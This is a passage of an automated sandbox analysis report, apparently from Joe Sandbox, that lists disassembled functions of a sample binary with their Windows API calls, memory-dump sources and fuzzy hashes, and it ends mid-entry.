Opcode Fuzzy Hash: e9c741e6cef91d1ad44b1bf83dcdc828c7f69a7359adf3abc32378d64ae2f0b5
Instruction Fuzzy Hash: D6E0ED71500218EBCB60EF95C545B99BBF9EB06360F10805EE846D3201E774AE04DFA1

Function 006B2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006B2BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 006B2BB5

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 179bd0fcbde1492f3a5e69a9a6c35173ea24c6c9ba795bff3b8d1ad557314d54
Instruction ID: f22f380c850fa5903e890422127eba5c969e7bac88f21cc50167f19869a9ba31
Opcode Fuzzy Hash: 179bd0fcbde1492f3a5e69a9a6c35173ea24c6c9ba795bff3b8d1ad557314d54
Instruction Fuzzy Hash: D0D0A9F929421B184E982AB0287B8E827C7ED42BB87A0128EE420956C1EE1190C0A329

Function 006912F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00691306
ShowWindow.USER32(00000000), ref: 0069130D

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 398d24033a2ae642883bc0bdddd28e4c6515f8ebef29f661299b8a1f145ad0dc
Instruction ID: 7321788195331fe88e6dbfd12b35aea3fab71fc285049e51c509c9d42dfce2b9
Opcode Fuzzy Hash: 398d24033a2ae642883bc0bdddd28e4c6515f8ebef29f661299b8a1f145ad0dc
Instruction Fuzzy Hash: 95C0123205C220BECB018BB4DC09C3BBBAAABA6312F04C908B0A5C0260C238C110DB11

Function 00691A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00691A09

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 24689c77f272fbe6d067430306b4e1b554897bb3f429da67fbb5071d12db104e
Instruction ID: baaf04b9fc6ae6e3a6479900d8cd2c249e6b88dd0086daf434e488eed77d5ce0
Opcode Fuzzy Hash: 24689c77f272fbe6d067430306b4e1b554897bb3f429da67fbb5071d12db104e
Instruction Fuzzy Hash: 93C1B170A002569BEF15CF68C484BF97BABAF17310F2801B9EC469F786DB349945CB61

Function 00693BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00693BBF

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c4070826b1283028df5c59ba9f8cf4eba247e18ce39d6abef6275725597724ee
Instruction ID: 729c3784fcf2383bd090c3a43e01ec6baa30e1b59b863846df329df9b60a4b30
Opcode Fuzzy Hash: c4070826b1283028df5c59ba9f8cf4eba247e18ce39d6abef6275725597724ee
Instruction Fuzzy Hash: 7F71BD71500B859EDF25EB70C8559E7B7EEAF15301F40082EE2AB87B41DA326A88DF11

Function 00698284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00698289

Part of subcall function 006913DC: __EH_prolog.LIBCMT ref: 006913E1

Part of subcall function 0069A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0069A598

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 614a6260fc72890961daf126d680ad1787b29c6c22f30295fc097b1b8458c01c
Instruction ID: c84ca5b0e8974efcd8485b1787528d78a829374c464f2a43aded615127a71e16
Opcode Fuzzy Hash: 614a6260fc72890961daf126d680ad1787b29c6c22f30295fc097b1b8458c01c
Instruction Fuzzy Hash: 6C41B6719446589EDF20EBA0CC55AE9B3AEAF11704F0404EFE04A97583EB715E85CB50

Function 006913E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006913E1

Part of subcall function 00695E37: __EH_prolog.LIBCMT ref: 00695E3C

Part of subcall function 0069CE40: __EH_prolog.LIBCMT ref: 0069CE45

Part of subcall function 0069B505: __EH_prolog.LIBCMT ref: 0069B50A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: aa454ab19f3f6ba1c3471c6b31bb7e344a9e97f66d9b3f3a27a24dfd3f6f3ef8
Instruction ID: 8e40ea7868cf4494d2891a61768eda303592a2c6ed8b6533d2d1ba8edaef6ed0
Opcode Fuzzy Hash: aa454ab19f3f6ba1c3471c6b31bb7e344a9e97f66d9b3f3a27a24dfd3f6f3ef8
Instruction Fuzzy Hash: A9417AB0905B419EE724DF798885AE6FBEABF19300F50492ED5FF87282CB312654CB14

Function 006913DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006913E1

Part of subcall function 00695E37: __EH_prolog.LIBCMT ref: 00695E3C

Part of subcall function 0069CE40: __EH_prolog.LIBCMT ref: 0069CE45

Part of subcall function 0069B505: __EH_prolog.LIBCMT ref: 0069B50A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 2518d1065e478ab7fff9c7748763022d19ac7ffabfe0d4eef9f08c57e664f7be
Instruction ID: cf01b336defa09776848bb04017367562d317ad42e60d77a0a3c6adef787491b
Opcode Fuzzy Hash: 2518d1065e478ab7fff9c7748763022d19ac7ffabfe0d4eef9f08c57e664f7be
Instruction Fuzzy Hash: E8416AB0905B419EE724DF798885AE6FBEABF19300F50492ED5FE87282CB312654CB15

Function 006AB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006AB098

Part of subcall function 006913DC: __EH_prolog.LIBCMT ref: 006913E1

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 8b98bec56fa3b59bae0e7fa62eccc0b5924cb2b2f74fa787290645d120c7ae25
Instruction ID: a03bd1d66af33d18b9a69e41dbf5c4efafa6b1e17d30a575d5d50def59d841d3
Opcode Fuzzy Hash: 8b98bec56fa3b59bae0e7fa62eccc0b5924cb2b2f74fa787290645d120c7ae25
Instruction Fuzzy Hash: CB318F75D0024ADECF15EF64C9619EEBBBAAF06304F10449EE409B7242D735AE05CFA5

Function 006BAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,006C3A34), ref: 006BACF8

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 2645e00e5aba58609f575bac53dc2ef371db215d8e06654a34a4eb966e9804cf
Instruction ID: 635bad98f3bd353771427dd4bc0acf04c20244e09c2e071e44bf688f960d1e29
Opcode Fuzzy Hash: 2645e00e5aba58609f575bac53dc2ef371db215d8e06654a34a4eb966e9804cf
Instruction Fuzzy Hash: D21106B3A002356FDB229EA8EC508EA77A7AF847207164220FD15EB354D731EC81C7D2

Function 00699215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0069921A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c8282b3398510f9fbafc16e928b9792760a78773f658a00d0977b0c192c15730
Instruction ID: 9968ca5bbbdae18e4425f6bbcf3c8f5415e7997e68d361cdd4d91c4a454e8e57
Opcode Fuzzy Hash: c8282b3398510f9fbafc16e928b9792760a78773f658a00d0977b0c192c15730
Instruction Fuzzy Hash: A901A533910529ABCF11ABACCD819DEB73BAF89740F01412DE812BB652DA348E04C6B4

Function 006B3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 006B3C3F

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 755041dd3be7d8556459fcf7f8881dff69a25a05536a33411f8f7970be169645
Instruction ID: 85c0746a5b7c990e98f13b77da4000a3727cc11b1647aea94378cc2492ca7ff5
Opcode Fuzzy Hash: 755041dd3be7d8556459fcf7f8881dff69a25a05536a33411f8f7970be169645
Instruction Fuzzy Hash: EDF0A0723002269F8F118EE8EC109DA7BABEF01B207104124FA05E7390DB31DAA0CB90

Function 006B8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006BCA2C,00000000,?,006B6CBE,?,00000008,?,006B91E0,?,?,?), ref: 006B8E38

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 837d29b6c7e351361921115ad3255816fdf33f606eece1f4ae00057d52ebc70a
Instruction ID: 01dc1a6c343c00ee1c3c5ee59d39e805bf3a34414b9c65b9b1d6d4c3a0010261
Opcode Fuzzy Hash: 837d29b6c7e351361921115ad3255816fdf33f606eece1f4ae00057d52ebc70a
Instruction Fuzzy Hash: EFE0A0B12022265FDBB12B259C14BDF764F9B817A0B150110AC1897281CF20CC82C3B4

Function 00695ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00695AC2

Part of subcall function 0069B505: __EH_prolog.LIBCMT ref: 0069B50A

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 115f30cf01c63c4211137b9572920f4da08500042ea62d977f167563199b356a
Instruction ID: 73e2a38533ba3f8f2b7664c56ecb3cb1b5b456739bf4d9c6f86a9f07f1d6e0e9
Opcode Fuzzy Hash: 115f30cf01c63c4211137b9572920f4da08500042ea62d977f167563199b356a
Instruction Fuzzy Hash: EE01D130400680CAE715FBB8C0817DDFBA5DF19308F50408DA45613282CBB01B08DBA7

Function 0069A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0069A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0069A592,000000FF,?,?), ref: 0069A6C4
Part of subcall function 0069A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0069A592,000000FF,?,?), ref: 0069A6F2
Part of subcall function 0069A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0069A592,000000FF,?,?), ref: 0069A6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0069A598

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: dbe66ea18f1dfd7b5e494848c4862efabf4ef6398a911faac4d3eb010420cb27
Instruction ID: 176ab4c511c9f0330e3a687cd87671cc7cdda9abbf4464430851ff66eef855b2
Opcode Fuzzy Hash: dbe66ea18f1dfd7b5e494848c4862efabf4ef6398a911faac4d3eb010420cb27
Instruction Fuzzy Hash: F9F0E232008390AACF6257F48904BCB7BEA6F1A331F04CA0DF0FD52196C27110988BA3

Function 006A0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 006A0E3D

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 6636b3ec3939f3a340a342c6ef92ed9e1f22c26431eb9aa69b832221712cfb23
Instruction ID: f0077865f6a3a2e36ac1e6a1cd0a9ea87497c174ce42826f85d246385d07610f
Opcode Fuzzy Hash: 6636b3ec3939f3a340a342c6ef92ed9e1f22c26431eb9aa69b832221712cfb23
Instruction Fuzzy Hash: CCD02B11B0116466EF513728A815FFE2A0B8FCB320F0C006EF0465F783CE840C82B676

Function 006AA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 006AA62C

Part of subcall function 006AA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 006AA3DA

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 0c35d002837dedf691eba37c824e0297dea5196d5c17cc298b1a8aafa6837394
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: DCD0C77121020977DF417BA58E169AE7597EB02340F048126B842D5151EBB2DD10DD66

Function 006ADD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,006A1B3E), ref: 006ADD92

Part of subcall function 006AB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006AB579
Part of subcall function 006AB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006AB58A
Part of subcall function 006AB568: IsDialogMessageW.USER32(000103E4,?), ref: 006AB59E
Part of subcall function 006AB568: TranslateMessage.USER32(?), ref: 006AB5AC
Part of subcall function 006AB568: DispatchMessageW.USER32(?), ref: 006AB5B6

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 833897e6979628e674923a2bf998ded5e11cf2a0b32261eb398dfccc19c8b726
Instruction ID: e8bc87f9a5bbfbed100d4e94e33acd5e45b46a7be40c65788039890156923131
Opcode Fuzzy Hash: 833897e6979628e674923a2bf998ded5e11cf2a0b32261eb398dfccc19c8b726
Instruction Fuzzy Hash: D0D09E31144300BAD7417B51CD06F1A7AE3AB89B04F405559B284740B186729E21DF15

Function 006AE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 006AE5E3

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 236fd4ba6388761500198ef92571c04ba68854b4a4102be219264925d500e410
Instruction ID: a3c3e6208a13eda8c0e5b5eec5c1ffc54831b6a6805f2ba3243161e66f8f227e
Opcode Fuzzy Hash: 236fd4ba6388761500198ef92571c04ba68854b4a4102be219264925d500e410
Instruction Fuzzy Hash: DDD0C9B0580640DAD745FBA9A847B643297B327B84F901505F246995A1DA6B8D81CF09

Function 006998BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,006997BE), ref: 006998C8

Memory Dump Source

